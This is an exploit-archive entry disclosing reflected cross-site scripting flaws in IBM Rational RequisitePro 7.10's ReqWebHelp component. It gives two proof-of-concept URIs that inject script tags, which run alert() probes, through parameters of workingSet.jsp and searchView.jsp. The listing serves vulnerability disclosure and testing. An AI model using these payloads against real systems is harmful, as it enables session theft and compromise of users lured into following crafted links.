[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : IBM Rational RequisitePro 7.10 and ReqWebHelp Multiple Cross Site Scripting
# Published : 2009-10-15
# Author : IBM
# Previous Title : Pentaho <= 1.7.0.1062 xss and information disclosure
# Next Title : Achievo <= 1.3.4 xss


Attackers can exploit these issues by enticing an unsuspecting victim into following a malicious URI.

The following example URIs are available:

http://www.example.com/ReqWebHelp/advanced/workingSet.jsp?operation=add*/--&gt;&lt;/script&gt;&lt;script&gt;alert(289325)&lt;/script&gt;&amp;workingSet=

http://www.example.com/ReqWebHelp/basic/searchView.jsp?searchWord=&gt;''&gt;&lt;script&gt;alert(306531)&lt;/script&gt;&amp;maxHits=&gt;''&gt;&lt;script&gt;alert(306531)&lt;/script&gt;&amp;scopedSearch=&gt;''&gt;&lt;script&gt;alert(306531)&lt;/script&gt;&amp;scope=&gt;''&gt;&lt;script&gt;alert(306531)&lt;/script&gt;